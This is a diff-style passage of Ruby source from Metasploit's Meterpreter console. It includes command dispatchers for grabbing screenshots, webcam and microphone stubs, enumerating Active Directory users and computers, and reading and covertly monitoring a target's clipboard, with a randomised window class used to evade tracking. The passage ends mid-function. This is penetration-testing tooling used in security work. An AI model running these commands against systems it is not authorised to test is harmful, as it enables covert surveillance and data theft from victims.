11
|
+
# Espia - Capture audio, video, screenshots from the remote system
|
|
12
|
+
#
|
|
13
|
+
###
|
|
14
|
+
class Console::CommandDispatcher::Espia
|
|
15
|
+
|
|
16
|
+
Klass = Console::CommandDispatcher::Espia
|
|
17
|
+
|
|
18
|
+
include Console::CommandDispatcher
|
|
19
|
+
|
|
20
|
+
#
|
|
21
|
+
# Initializes an instance of the espia command interaction.
|
|
22
|
+
#
|
|
23
|
+
def initialize(shell)
|
|
24
|
+
super
|
|
25
|
+
end
|
|
26
|
+
|
|
27
|
+
#
|
|
28
|
+
# List of supported commands.
|
|
29
|
+
#
|
|
30
|
+
def commands
|
|
31
|
+
{
|
|
32
|
+
# "dev_image" => "Attempt to grab a frame from webcam",
|
|
33
|
+
# "dev_audio" => "Attempt to record microphone audio",
|
|
34
|
+
"screengrab" => "Attempt to grab screen shot from process's active desktop"
|
|
35
|
+
}
|
|
36
|
+
end
|
|
37
|
+
|
|
38
|
+
def cmd_dev_image()
|
|
39
|
+
client.espia.espia_video_get_dev_image()
|
|
40
|
+
print_line("[*] Done.")
|
|
41
|
+
|
|
42
|
+
return true
|
|
43
|
+
end
|
|
44
|
+
|
|
45
|
+
def cmd_dev_audio(*args)
|
|
46
|
+
maxrec = 60
|
|
47
|
+
|
|
48
|
+
if (args.length < 1)
|
|
49
|
+
print_line("Usage: dev_audio <rec_secs>\n")
|
|
50
|
+
print_line("Record mic audio\n")
|
|
51
|
+
return true
|
|
52
|
+
end
|
|
53
|
+
|
|
54
|
+
secs = args[0].to_i
|
|
55
|
+
if secs > 0 and secs <= maxrec
|
|
56
|
+
milsecs = secs*1000
|
|
57
|
+
print_line("[*] Recording #{milsecs} miliseconds.\n")
|
|
58
|
+
client.espia.espia_audio_get_dev_audio(milsecs)
|
|
59
|
+
print_line("[*] Done.")
|
|
60
|
+
else
|
|
61
|
+
print_line("[-] Error: Recording time 0 to 60 secs \n")
|
|
62
|
+
end
|
|
63
|
+
|
|
64
|
+
return true
|
|
65
|
+
end
|
|
66
|
+
|
|
67
|
+
#
|
|
68
|
+
# Grab a screenshot of the current interactive desktop.
|
|
69
|
+
#
|
|
70
|
+
def cmd_screengrab( *args )
|
|
71
|
+
if( args[0] and args[0] == "-h" )
|
|
72
|
+
print_line("Usage: screengrab <path.jpeg> [view in browser: true|false]\n")
|
|
73
|
+
print_line("Grab a screenshot of the current interactive desktop.\n")
|
|
74
|
+
return true
|
|
75
|
+
end
|
|
76
|
+
|
|
77
|
+
show = true
|
|
78
|
+
show = false if (args[1] and args[1] =~ /^(f|n|0)/i)
|
|
79
|
+
|
|
80
|
+
path = args[0] || Rex::Text.rand_text_alpha(8) + ".jpeg"
|
|
81
|
+
|
|
82
|
+
data = client.espia.espia_image_get_dev_screen
|
|
83
|
+
|
|
84
|
+
if( data )
|
|
85
|
+
::File.open( path, 'wb' ) do |fd|
|
|
86
|
+
fd.write( data )
|
|
87
|
+
end
|
|
88
|
+
path = ::File.expand_path( path )
|
|
89
|
+
print_line( "Screenshot saved to: #{path}" )
|
|
90
|
+
Rex::Compat.open_file( path ) if show
|
|
91
|
+
end
|
|
92
|
+
|
|
93
|
+
return true
|
|
94
|
+
end
|
|
95
|
+
|
|
96
|
+
#
|
|
97
|
+
# Name for this dispatcher
|
|
98
|
+
#
|
|
99
|
+
def name
|
|
100
|
+
"Espia"
|
|
101
|
+
end
|
|
102
|
+
|
|
103
|
+
end
|
|
104
|
+
|
|
105
|
+
end
|
|
106
|
+
end
|
|
107
|
+
end
|
|
108
|
+
end
|
|
109
|
+
|
|
@@ -0,0 +1,65 @@
|
|
|
1
|
+
# -*- coding: binary -*-
|
|
2
|
+
require 'rex/post/meterpreter'
|
|
3
|
+
|
|
4
|
+
module Rex
|
|
5
|
+
module Post
|
|
6
|
+
module Meterpreter
|
|
7
|
+
module Ui
|
|
8
|
+
|
|
9
|
+
###
|
|
10
|
+
#
|
|
11
|
+
# Extended API user interface.
|
|
12
|
+
#
|
|
13
|
+
###
|
|
14
|
+
class Console::CommandDispatcher::Extapi
|
|
15
|
+
|
|
16
|
+
require 'rex/post/meterpreter/ui/console/command_dispatcher/extapi/window'
|
|
17
|
+
require 'rex/post/meterpreter/ui/console/command_dispatcher/extapi/service'
|
|
18
|
+
require 'rex/post/meterpreter/ui/console/command_dispatcher/extapi/clipboard'
|
|
19
|
+
require 'rex/post/meterpreter/ui/console/command_dispatcher/extapi/adsi'
|
|
20
|
+
require 'rex/post/meterpreter/ui/console/command_dispatcher/extapi/wmi'
|
|
21
|
+
|
|
22
|
+
Klass = Console::CommandDispatcher::Extapi
|
|
23
|
+
|
|
24
|
+
Dispatchers =
|
|
25
|
+
[
|
|
26
|
+
Klass::Window,
|
|
27
|
+
Klass::Service,
|
|
28
|
+
Klass::Clipboard,
|
|
29
|
+
Klass::Adsi,
|
|
30
|
+
Klass::Wmi
|
|
31
|
+
]
|
|
32
|
+
|
|
33
|
+
include Console::CommandDispatcher
|
|
34
|
+
|
|
35
|
+
#
|
|
36
|
+
# Initializes an instance of the extended API command interaction.
|
|
37
|
+
#
|
|
38
|
+
def initialize(shell)
|
|
39
|
+
super
|
|
40
|
+
|
|
41
|
+
Dispatchers.each { |d| shell.enstack_dispatcher(d) }
|
|
42
|
+
end
|
|
43
|
+
|
|
44
|
+
#
|
|
45
|
+
#
|
|
46
|
+
# List of supported commands.
|
|
47
|
+
#
|
|
48
|
+
def commands
|
|
49
|
+
{
|
|
50
|
+
}
|
|
51
|
+
end
|
|
52
|
+
|
|
53
|
+
#
|
|
54
|
+
# Name for this dispatcher
|
|
55
|
+
#
|
|
56
|
+
def name
|
|
57
|
+
"Extended API Extension"
|
|
58
|
+
end
|
|
59
|
+
|
|
60
|
+
end
|
|
61
|
+
|
|
62
|
+
end
|
|
63
|
+
end
|
|
64
|
+
end
|
|
65
|
+
end
|
|
@@ -0,0 +1,198 @@
|
|
|
1
|
+
# -*- coding: binary -*-
|
|
2
|
+
require 'rex/post/meterpreter'
|
|
3
|
+
|
|
4
|
+
module Rex
|
|
5
|
+
module Post
|
|
6
|
+
module Meterpreter
|
|
7
|
+
module Ui
|
|
8
|
+
|
|
9
|
+
###
|
|
10
|
+
#
|
|
11
|
+
# Extended API ADSI management user interface.
|
|
12
|
+
#
|
|
13
|
+
###
|
|
14
|
+
class Console::CommandDispatcher::Extapi::Adsi
|
|
15
|
+
|
|
16
|
+
Klass = Console::CommandDispatcher::Extapi::Adsi
|
|
17
|
+
|
|
18
|
+
include Console::CommandDispatcher
|
|
19
|
+
|
|
20
|
+
# Zero indicates "no limit"
|
|
21
|
+
DEFAULT_MAX_RESULTS = 0
|
|
22
|
+
DEFAULT_PAGE_SIZE = 0
|
|
23
|
+
|
|
24
|
+
#
|
|
25
|
+
# List of supported commands.
|
|
26
|
+
#
|
|
27
|
+
def commands
|
|
28
|
+
{
|
|
29
|
+
"adsi_user_enum" => "Enumerate all users on the specified domain.",
|
|
30
|
+
"adsi_computer_enum" => "Enumerate all computers on the specified domain.",
|
|
31
|
+
"adsi_domain_query" => "Enumerate all objects on the specified domain that match a filter."
|
|
32
|
+
}
|
|
33
|
+
end
|
|
34
|
+
|
|
35
|
+
#
|
|
36
|
+
# Name for this dispatcher
|
|
37
|
+
#
|
|
38
|
+
def name
|
|
39
|
+
"Extapi: ADSI Management"
|
|
40
|
+
end
|
|
41
|
+
|
|
42
|
+
#
|
|
43
|
+
# Options for the adsi_user_enum command.
|
|
44
|
+
#
|
|
45
|
+
@@adsi_user_enum_opts = Rex::Parser::Arguments.new(
|
|
46
|
+
"-h" => [ false, "Help banner" ],
|
|
47
|
+
"-m" => [ true, "Maximum results to return." ],
|
|
48
|
+
"-p" => [ true, "Result set page size." ]
|
|
49
|
+
)
|
|
50
|
+
|
|
51
|
+
def adsi_user_enum_usage
|
|
52
|
+
print(
|
|
53
|
+
"\nUsage: adsi_user_enum <domain> [-h] [-m maxresults] [-p pagesize]\n\n" +
|
|
54
|
+
"Enumerate the users on the target domain.\n\n" +
|
|
55
|
+
"Enumeration returns information such as the user name, SAM account name, locked\n" +
|
|
56
|
+
"status, desc, and comment.\n" +
|
|
57
|
+
@@adsi_user_enum_opts.usage)
|
|
58
|
+
end
|
|
59
|
+
|
|
60
|
+
#
|
|
61
|
+
# Enumerate domain users.
|
|
62
|
+
#
|
|
63
|
+
def cmd_adsi_user_enum(*args)
|
|
64
|
+
args.unshift("-h") if args.length == 0
|
|
65
|
+
if args.include?("-h")
|
|
66
|
+
adsi_user_enum_usage
|
|
67
|
+
return true
|
|
68
|
+
end
|
|
69
|
+
|
|
70
|
+
domain = args.shift
|
|
71
|
+
filter = "(objectClass=user)"
|
|
72
|
+
fields = [
|
|
73
|
+
"samaccountname",
|
|
74
|
+
"name",
|
|
75
|
+
"distinguishedname",
|
|
76
|
+
"description",
|
|
77
|
+
"comment"
|
|
78
|
+
]
|
|
79
|
+
args = [domain, filter] + fields + args
|
|
80
|
+
return cmd_adsi_domain_query(*args)
|
|
81
|
+
end
|
|
82
|
+
|
|
83
|
+
#
|
|
84
|
+
# Options for the adsi_computer_enum command.
|
|
85
|
+
#
|
|
86
|
+
@@adsi_computer_enum_opts = Rex::Parser::Arguments.new(
|
|
87
|
+
"-h" => [ false, "Help banner" ],
|
|
88
|
+
"-m" => [ true, "Maximum results to return." ],
|
|
89
|
+
"-p" => [ true, "Result set page size." ]
|
|
90
|
+
)
|
|
91
|
+
|
|
92
|
+
def adsi_computer_enum_usage
|
|
93
|
+
print(
|
|
94
|
+
"\nUsage: adsi_computer_enum <domain> [-h] [-m maxresults] [-p pagesize]\n\n" +
|
|
95
|
+
"Enumerate the computers on the target domain.\n\n" +
|
|
96
|
+
"Enumeration returns information such as the computer name, desc, and comment.\n" +
|
|
97
|
+
@@adsi_computer_enum_opts.usage)
|
|
98
|
+
end
|
|
99
|
+
|
|
100
|
+
#
|
|
101
|
+
# Enumerate domain computers.
|
|
102
|
+
#
|
|
103
|
+
def cmd_adsi_computer_enum(*args)
|
|
104
|
+
args.unshift("-h") if args.length == 0
|
|
105
|
+
if args.include?("-h")
|
|
106
|
+
adsi_computer_enum_usage
|
|
107
|
+
return true
|
|
108
|
+
end
|
|
109
|
+
|
|
110
|
+
domain = args.shift
|
|
111
|
+
filter = "(objectClass=computer)"
|
|
112
|
+
fields = [
|
|
113
|
+
"name",
|
|
114
|
+
"distinguishedname",
|
|
115
|
+
"description",
|
|
116
|
+
"comment"
|
|
117
|
+
]
|
|
118
|
+
args = [domain, filter] + fields + args
|
|
119
|
+
return cmd_adsi_domain_query(*args)
|
|
120
|
+
end
|
|
121
|
+
|
|
122
|
+
#
|
|
123
|
+
# Options for the adsi_domain_query command.
|
|
124
|
+
#
|
|
125
|
+
@@adsi_domain_query_opts = Rex::Parser::Arguments.new(
|
|
126
|
+
"-h" => [ false, "Help banner" ],
|
|
127
|
+
"-m" => [ true, "Maximum results to return." ],
|
|
128
|
+
"-p" => [ true, "Result set page size." ]
|
|
129
|
+
)
|
|
130
|
+
|
|
131
|
+
def adsi_domain_query_usage
|
|
132
|
+
print(
|
|
133
|
+
"\nUsage: adsi_domain_query <domain> <filter> <field 1> [field 2 [field ..]] [-h] [-m maxresults] [-p pagesize]\n\n" +
|
|
134
|
+
"Enumerate the objects on the target domain.\n\n" +
|
|
135
|
+
"Enumeration returns the set of fields that are specified.\n" +
|
|
136
|
+
@@adsi_domain_query_opts.usage)
|
|
137
|
+
end
|
|
138
|
+
|
|
139
|
+
#
|
|
140
|
+
# Enumerate domain objects.
|
|
141
|
+
#
|
|
142
|
+
def cmd_adsi_domain_query(*args)
|
|
143
|
+
page_size = DEFAULT_PAGE_SIZE
|
|
144
|
+
max_results = DEFAULT_MAX_RESULTS
|
|
145
|
+
|
|
146
|
+
args.unshift("-h") if args.length < 3
|
|
147
|
+
|
|
148
|
+
@@adsi_domain_query_opts.parse(args) { |opt, idx, val|
|
|
149
|
+
case opt
|
|
150
|
+
when "-p"
|
|
151
|
+
page_size = val.to_i
|
|
152
|
+
when "-m"
|
|
153
|
+
max_results = val.to_i
|
|
154
|
+
when "-h"
|
|
155
|
+
adsi_domain_query_usage
|
|
156
|
+
return true
|
|
157
|
+
end
|
|
158
|
+
}
|
|
159
|
+
|
|
160
|
+
# Assume that the flags are passed in at the end. Safe?
|
|
161
|
+
switch_index = args.index { |a| a.start_with?("-") }
|
|
162
|
+
if switch_index
|
|
163
|
+
args = args.first(switch_index)
|
|
164
|
+
end
|
|
165
|
+
|
|
166
|
+
domain = args.shift
|
|
167
|
+
filter = args.shift
|
|
168
|
+
|
|
169
|
+
objects = client.extapi.adsi.domain_query(domain, filter, max_results, page_size, args)
|
|
170
|
+
|
|
171
|
+
table = Rex::Ui::Text::Table.new(
|
|
172
|
+
'Header' => "#{domain} Objects",
|
|
173
|
+
'Indent' => 0,
|
|
174
|
+
'SortIndex' => 0,
|
|
175
|
+
'Columns' => objects[:fields]
|
|
176
|
+
)
|
|
177
|
+
|
|
178
|
+
objects[:results].each do |c|
|
|
179
|
+
table << c
|
|
180
|
+
end
|
|
181
|
+
|
|
182
|
+
print_line
|
|
183
|
+
print_line(table.to_s)
|
|
184
|
+
|
|
185
|
+
print_line("Total objects: #{objects[:results].length}")
|
|
186
|
+
|
|
187
|
+
print_line
|
|
188
|
+
|
|
189
|
+
return true
|
|
190
|
+
end
|
|
191
|
+
|
|
192
|
+
end
|
|
193
|
+
|
|
194
|
+
end
|
|
195
|
+
end
|
|
196
|
+
end
|
|
197
|
+
end
|
|
198
|
+
|
|
@@ -0,0 +1,444 @@
|
|
|
1
|
+
# -*- coding: binary -*-
|
|
2
|
+
require 'rex/post/meterpreter'
|
|
3
|
+
|
|
4
|
+
module Rex
|
|
5
|
+
module Post
|
|
6
|
+
module Meterpreter
|
|
7
|
+
module Ui
|
|
8
|
+
###
|
|
9
|
+
#
|
|
10
|
+
# Extended API window management user interface.
|
|
11
|
+
#
|
|
12
|
+
###
|
|
13
|
+
class Console::CommandDispatcher::Extapi::Clipboard
|
|
14
|
+
|
|
15
|
+
Klass = Console::CommandDispatcher::Extapi::Clipboard
|
|
16
|
+
|
|
17
|
+
include Console::CommandDispatcher
|
|
18
|
+
|
|
19
|
+
#
|
|
20
|
+
# List of supported commands.
|
|
21
|
+
#
|
|
22
|
+
def commands
|
|
23
|
+
{
|
|
24
|
+
"clipboard_get_data" => "Read the target's current clipboard (text, files, images)",
|
|
25
|
+
"clipboard_set_text" => "Write text to the target's clipboard",
|
|
26
|
+
"clipboard_monitor_start" => "Start the clipboard monitor",
|
|
27
|
+
"clipboard_monitor_pause" => "Pause the active clipboard monitor",
|
|
28
|
+
"clipboard_monitor_resume" => "Resume the paused clipboard monitor",
|
|
29
|
+
"clipboard_monitor_dump" => "Dump all captured clipboard content",
|
|
30
|
+
"clipboard_monitor_purge" => "Delete all captured cilpboard content without dumping it",
|
|
31
|
+
"clipboard_monitor_stop" => "Stop the clipboard monitor"
|
|
32
|
+
}
|
|
33
|
+
end
|
|
34
|
+
|
|
35
|
+
#
|
|
36
|
+
# Name for this dispatcher
|
|
37
|
+
#
|
|
38
|
+
def name
|
|
39
|
+
"Extapi: Clipboard Management"
|
|
40
|
+
end
|
|
41
|
+
|
|
42
|
+
#
|
|
43
|
+
# Options for the clipboard_get_data command.
|
|
44
|
+
#
|
|
45
|
+
@@get_data_opts = Rex::Parser::Arguments.new(
|
|
46
|
+
"-h" => [ false, "Help banner" ],
|
|
47
|
+
"-d" => [ true, "Download non-text content to the specified folder (default: current dir)", nil ]
|
|
48
|
+
)
|
|
49
|
+
|
|
50
|
+
def print_clipboard_get_data_usage
|
|
51
|
+
print(
|
|
52
|
+
"\nUsage: clipboard_get_data [-h] [-d]\n\n" +
|
|
53
|
+
"Attempts to read the data from the target's clipboard. If the data is in a\n" +
|
|
54
|
+
"supported format, it is read and returned to the user.\n" +
|
|
55
|
+
@@get_data_opts.usage + "\n")
|
|
56
|
+
end
|
|
57
|
+
|
|
58
|
+
#
|
|
59
|
+
# Get the data from the target's clipboard
|
|
60
|
+
#
|
|
61
|
+
def cmd_clipboard_get_data(*args)
|
|
62
|
+
download_content = false
|
|
63
|
+
download_path = nil
|
|
64
|
+
@@get_data_opts.parse(args) { |opt, idx, val|
|
|
65
|
+
case opt
|
|
66
|
+
when "-d"
|
|
67
|
+
download_content = true
|
|
68
|
+
download_path = val
|
|
69
|
+
when "-h"
|
|
70
|
+
print_clipboard_get_data_usage
|
|
71
|
+
return true
|
|
72
|
+
end
|
|
73
|
+
}
|
|
74
|
+
|
|
75
|
+
dump = client.extapi.clipboard.get_data(download_content)
|
|
76
|
+
|
|
77
|
+
if dump.length == 0
|
|
78
|
+
print_error( "The current Clipboard data format is not supported." )
|
|
79
|
+
return false
|
|
80
|
+
end
|
|
81
|
+
|
|
82
|
+
parse_dump(dump, download_content, download_content, download_path)
|
|
83
|
+
return true
|
|
84
|
+
end
|
|
85
|
+
|
|
86
|
+
#
|
|
87
|
+
# Options for the clipboard_set_text command.
|
|
88
|
+
#
|
|
89
|
+
@@set_text_opts = Rex::Parser::Arguments.new(
|
|
90
|
+
"-h" => [ false, "Help banner" ]
|
|
91
|
+
)
|
|
92
|
+
|
|
93
|
+
def print_clipboard_set_text_usage
|
|
94
|
+
print(
|
|
95
|
+
"\nUsage: clipboard_set_text [-h] <text>\n\n" +
|
|
96
|
+
"Set the target's clipboard to the given text value.\n\n")
|
|
97
|
+
end
|
|
98
|
+
|
|
99
|
+
#
|
|
100
|
+
# Set the clipboard data to the given text.
|
|
101
|
+
#
|
|
102
|
+
def cmd_clipboard_set_text(*args)
|
|
103
|
+
args.unshift "-h" if args.length == 0
|
|
104
|
+
|
|
105
|
+
@@set_text_opts.parse(args) { |opt, idx, val|
|
|
106
|
+
case opt
|
|
107
|
+
when "-h"
|
|
108
|
+
print_clipboard_set_text_usage
|
|
109
|
+
return true
|
|
110
|
+
end
|
|
111
|
+
}
|
|
112
|
+
|
|
113
|
+
return client.extapi.clipboard.set_text(args.join(" "))
|
|
114
|
+
end
|
|
115
|
+
|
|
116
|
+
#
|
|
117
|
+
# Options for the clipboard_monitor_start command.
|
|
118
|
+
#
|
|
119
|
+
@@monitor_start_opts = Rex::Parser::Arguments.new(
|
|
120
|
+
"-h" => [ false, "Help banner" ],
|
|
121
|
+
"-i" => [ true, "Capture image content when monitoring (default: true)" ]
|
|
122
|
+
)
|
|
123
|
+
|
|
124
|
+
#
|
|
125
|
+
# Help for the clipboard_monitor_start command.
|
|
126
|
+
#
|
|
127
|
+
def print_clipboard_monitor_start_usage
|
|
128
|
+
print(
|
|
129
|
+
"\nUsage: clipboard_monitor_start [-i true|false] [-h]\n\n" +
|
|
130
|
+
"Starts a background clipboard monitoring thread. The thread watches\n" +
|
|
131
|
+
"the clipboard on the target, under the context of the current desktop, and when\n" +
|
|
132
|
+
"changes are detected the contents of the clipboard are captured. Contents can be\n" +
|
|
133
|
+
"dumped periodically. Image content can be captured as well (and will be by default)\n" +
|
|
134
|
+
"however this can consume quite a bit of memory.\n\n" +
|
|
135
|
+
@@monitor_start_opts.usage + "\n")
|
|
136
|
+
end
|
|
137
|
+
|
|
138
|
+
#
|
|
139
|
+
# Start the clipboard monitor.
|
|
140
|
+
#
|
|
141
|
+
def cmd_clipboard_monitor_start(*args)
|
|
142
|
+
capture_images = true
|
|
143
|
+
|
|
144
|
+
@@monitor_start_opts.parse(args) { |opt, idx, val|
|
|
145
|
+
case opt
|
|
146
|
+
when "-i"
|
|
147
|
+
# default this to true
|
|
148
|
+
capture_images = val.downcase != 'false'
|
|
149
|
+
when "-h"
|
|
150
|
+
print_clipboard_monitor_start_usage
|
|
151
|
+
return true
|
|
152
|
+
end
|
|
153
|
+
}
|
|
154
|
+
|
|
155
|
+
client.extapi.clipboard.monitor_start({
|
|
156
|
+
# random class and window name so that it isn't easy
|
|
157
|
+
# to track via a script
|
|
158
|
+
:wincls => Rex::Text.rand_text_alpha(8),
|
|
159
|
+
:cap_img => capture_images
|
|
160
|
+
})
|
|
161
|
+
|
|
162
|
+
print_good("Clipboard monitor started")
|
|
163
|
+
end
|
|
164
|
+
|
|
165
|
+
#
|
|
166
|
+
# Options for the clipboard_monitor_purge command.
|
|
167
|
+
#
|
|
168
|
+
@@monitor_purge_opts = Rex::Parser::Arguments.new(
|
|
169
|
+
"-h" => [ false, "Help banner" ]
|
|
170
|
+
)
|
|
171
|
+
|
|
172
|
+
#
|
|
173
|
+
# Help for the clipboard_monitor_purge command.
|
|
174
|
+
#
|
|
175
|
+
def print_clipboard_monitor_purge_usage
|
|
176
|
+
print("\nUsage: clipboard_monitor_purge [-h]\n\n" +
|
|
177
|
+
"Purge the captured contents from the monitor. This does not stop\n" +
|
|
178
|
+
"the monitor from running, it just removes captured content.\n\n" +
|
|
179
|
+
@@monitor_purge_opts.usage + "\n")
|
|
180
|
+
end
|
|
181
|
+
|
|
182
|
+
#
|
|
183
|
+
# Purge the clipboard monitor captured contents
|
|
184
|
+
#
|
|
185
|
+
def cmd_clipboard_monitor_purge(*args)
|
|
186
|
+
@@monitor_purge_opts.parse(args) { |opt, idx, val|
|
|
187
|
+
case opt
|
|
188
|
+
when "-h"
|
|
189
|
+
print_clipboard_monitor_purge_usage
|
|
190
|
+
return true
|
|
191
|
+
end
|
|
192
|
+
}
|
|
193
|
+
client.extapi.clipboard.monitor_purge
|
|
194
|
+
print_good("Captured clipboard contents purged successfully")
|
|
195
|
+
end
|
|
196
|
+
|
|
197
|
+
#
|
|
198
|
+
# Options for the clipboard_monitor_pause command.
|
|
199
|
+
#
|
|
200
|
+
@@monitor_pause_opts = Rex::Parser::Arguments.new(
|
|
201
|
+
"-h" => [ false, "Help banner" ]
|
|
202
|
+
)
|
|
203
|
+
|
|
204
|
+
#
|
|
205
|
+
# Help for the clipboard_monitor_pause command.
|
|
206
|
+
#
|
|
207
|
+
def print_clipboard_monitor_pause_usage
|
|
208
|
+
print("\nUsage: clipboard_monitor_pause [-h]\n\n" +
|
|
209
|
+
"Pause the currently running clipboard monitor thread.\n\n" +
|
|
210
|
+
@@monitor_pause_opts.usage + "\n")
|
|
211
|
+
end
|
|
212
|
+
|
|
213
|
+
#
|
|
214
|
+
# Pause the clipboard monitor captured contents
|
|
215
|
+
#
|
|
216
|
+
def cmd_clipboard_monitor_pause(*args)
|
|
217
|
+
@@monitor_pause_opts.parse(args) { |opt, idx, val|
|
|
218
|
+
case opt
|
|
219
|
+
when "-h"
|
|
220
|
+
print_clipboard_monitor_pause_usage
|
|
221
|
+
return true
|
|
222
|
+
end
|
|
223
|
+
}
|
|
224
|
+
client.extapi.clipboard.monitor_pause
|
|
225
|
+
print_good("Clipboard monitor paused successfully")
|
|
226
|
+
end
|
|
227
|
+
|
|
228
|
+
#
|
|
229
|
+
# Options for the clipboard_monitor_resumse command.
|
|
230
|
+
#
|
|
231
|
+
@@monitor_resume_opts = Rex::Parser::Arguments.new(
|
|
232
|
+
"-h" => [ false, "Help banner" ]
|
|
233
|
+
)
|
|
234
|
+
|
|
235
|
+
#
|
|
236
|
+
# Help for the clipboard_monitor_resume command.
|
|
237
|
+
#
|
|
238
|
+
def print_clipboard_monitor_resume_usage
|
|
239
|
+
print("\nUsage: clipboard_monitor_resume [-h]\n\n" +
|
|
240
|
+
"Resume the currently paused clipboard monitor thread.\n\n" +
|
|
241
|
+
@@monitor_resume_opts.usage + "\n")
|
|
242
|
+
end
|
|
243
|
+
|
|
244
|
+
#
|
|
245
|
+
# resume the clipboard monitor captured contents
|
|
246
|
+
#
|
|
247
|
+
def cmd_clipboard_monitor_resume(*args)
|
|
248
|
+
@@monitor_resume_opts.parse(args) { |opt, idx, val|
|
|
249
|
+
case opt
|
|
250
|
+
when "-h"
|
|
251
|
+
print_clipboard_monitor_resume_usage
|
|
252
|
+
return true
|
|
253
|
+
end
|
|
254
|
+
}
|
|
255
|
+
client.extapi.clipboard.monitor_resume
|
|
256
|
+
print_good("Clipboard monitor resumed successfully")
|
|
257
|
+
end
|
|
258
|
+
|
|
259
|
+
#
|
|
260
|
+
# Options for the clipboard_monitor_dump command.
|
|
261
|
+
#
|
|
262
|
+
@@monitor_dump_opts = Rex::Parser::Arguments.new(
|
|
263
|
+
"-h" => [ false, "Help banner" ],
|
|
264
|
+
"-i" => [ true, "Indicate if captured image data should be downloaded (default: true)" ],
|
|
265
|
+
"-f" => [ true, "Indicate if captured file data should be downloaded (default: true)" ],
|
|
266
|
+
"-p" => [ true, "Purge the contents of the monitor once dumped (default: true)" ],
|
|
267
|
+
"-d" => [ true, "Download non-text content to the specified folder (default: current dir)" ]
|
|
268
|
+
)
|
|
269
|
+
|
|
270
|
+
#
|
|
271
|
+
# Help for the clipboard_monitor_dump command.
|
|
272
|
+
#
|
|
273
|
+
def print_clipboard_monitor_dump_usage
|
|
274
|
+
print(
|
|
275
|
+
"\nUsage: clipboard_monitor_dump [-d true|false] [-d downloaddir] [-h]\n\n" +
|
|
276
|
+
"Dump the capture clipboard contents to the local machine..\n\n" +
|
|
277
|
+
@@monitor_dump_opts.usage + "\n")
|
|
278
|
+
end
|
|
279
|
+
|
|
280
|
+
#
|
|
281
|
+
# Dump the clipboard monitor contents to the local machine.
|
|
282
|
+
#
|
|
283
|
+
def cmd_clipboard_monitor_dump(*args)
|
|
284
|
+
purge = true
|
|
285
|
+
download_images = true
|
|
286
|
+
download_files = true
|
|
287
|
+
download_path = nil
|
|
288
|
+
|
|
289
|
+
@@monitor_dump_opts.parse(args) { |opt, idx, val|
|
|
290
|
+
case opt
|
|
291
|
+
when "-d"
|
|
292
|
+
download_path = val
|
|
293
|
+
when "-i"
|
|
294
|
+
download_images = val.downcase != 'false'
|
|
295
|
+
when "-f"
|
|
296
|
+
download_files = val.downcase != 'false'
|
|
297
|
+
when "-p"
|
|
298
|
+
purge = val.downcase != 'false'
|
|
299
|
+
when "-h"
|
|
300
|
+
print_clipboard_monitor_dump_usage
|
|
301
|
+
return true
|
|
302
|
+
end
|
|
303
|
+
}
|
|
304
|
+
|
|
305
|
+
dump = client.extapi.clipboard.monitor_dump({
|
|
306
|
+
:include_images => download_images,
|
|
307
|
+
:purge => purge
|
|
308
|
+
})
|
|
309
|
+
|
|
310
|
+
parse_dump(dump, download_images, download_files, download_path)
|
|
311
|
+
|
|
312
|
+
print_good("Clipboard monitor dumped")
|
|
313
|
+
end
|
|
314
|
+
|
|
315
|
+
#
|
|
316
|
+
# Options for the clipboard_monitor_stop command.
|
|
317
|
+
#
|
|
318
|
+
@@monitor_stop_opts = Rex::Parser::Arguments.new(
|
|
319
|
+
"-h" => [ false, "Help banner" ],
|
|
320
|
+
"-x" => [ true, "Indicate if captured clipboard data should be dumped (default: true)" ],
|
|
321
|
+
"-i" => [ true, "Indicate if captured image data should be downloaded (default: true)" ],
|
|
322
|
+
"-f" => [ true, "Indicate if captured file data should be downloaded (default: true)" ],
|
|
323
|
+
"-d" => [ true, "Download non-text content to the specified folder (default: current dir)" ]
|
|
324
|
+
)
|
|
325
|
+
|
|
326
|
+
#
|
|
327
|
+
# Help for the clipboard_monitor_stop command.
|
|
328
|
+
#
|
|
329
|
+
def print_clipboard_monitor_stop_usage
|
|
330
|
+
print(
|
|
331
|
+
"\nUsage: clipboard_monitor_stop [-d true|false] [-x true|false] [-d downloaddir] [-h]\n\n" +
|
|
332
|
+
"Stops a clipboard monitor thread and returns the captured data to the local machine.\n\n" +
|
|
333
|
+
@@monitor_stop_opts.usage + "\n")
|
|
334
|
+
end
|
|
335
|
+
|
|
336
|
+
#
|
|
337
|
+
# Stop the clipboard monitor.
|
|
338
|
+
#
|
|
339
|
+
def cmd_clipboard_monitor_stop(*args)
|
|
340
|
+
dump_data = true
|
|
341
|
+
download_images = true
|
|
342
|
+
download_files = true
|
|
343
|
+
download_path = nil
|
|
344
|
+
|
|
345
|
+
@@monitor_stop_opts.parse(args) { |opt, idx, val|
|
|
346
|
+
case opt
|
|
347
|
+
when "-d"
|
|
348
|
+
download_path = val
|
|
349
|
+
when "-x"
|
|
350
|
+
dump_data = val.downcase != 'false'
|
|
351
|
+
when "-i"
|
|
352
|
+
download_images = val.downcase != 'false'
|
|
353
|
+
when "-f"
|
|
354
|
+
download_files = val.downcase != 'false'
|
|
355
|
+
when "-h"
|
|
356
|
+
print_clipboard_monitor_stop_usage
|
|
357
|
+
return true
|
|
358
|
+
end
|
|
359
|
+
}
|
|
360
|
+
|
|
361
|
+
dump = client.extapi.clipboard.monitor_stop({
|
|
362
|
+
:dump => dump_data,
|
|
363
|
+
:include_images => download_images
|
|
364
|
+
})
|
|
365
|
+
|
|
366
|
+
parse_dump(dump, download_images, download_files, download_path) if dump_data
|
|
367
|
+
|
|
368
|
+
print_good("Clipboard monitor stopped")
|
|
369
|
+
end
|
|
370
|
+
|
|
371
|
+
private
|
|
372
|
+
|
|
373
|
+
def download_file( dest_folder, source )
|
|
374
|
+
stat = client.fs.file.stat( source )
|
|
375
|
+
base = ::Rex::Post::Meterpreter::Extensions::Stdapi::Fs::File.basename( source )
|
|
376
|
+
dest = File.join( dest_folder, base )
|
|
377
|
+
|
|
378
|
+
if stat.directory?
|
|
379
|
+
client.fs.dir.download( dest, source, true, true ) { |step, src, dst|
|
|
380
|
+
print_line( "#{step.ljust(11)} : #{src} -> #{dst}" )
|
|
381
|
+
client.framework.events.on_session_download( client, src, dest ) if msf_loaded?
|
|
382
|
+
}
|
|
383
|
+
elsif stat.file?
|
|
384
|
+
client.fs.file.download( dest, source ) { |step, src, dst|
|
|
385
|
+
print_line( "#{step.ljust(11)} : #{src} -> #{dst}" )
|
|
386
|
+
client.framework.events.on_session_download( client, src, dest ) if msf_loaded?
|
|
387
|
+
}
|
|
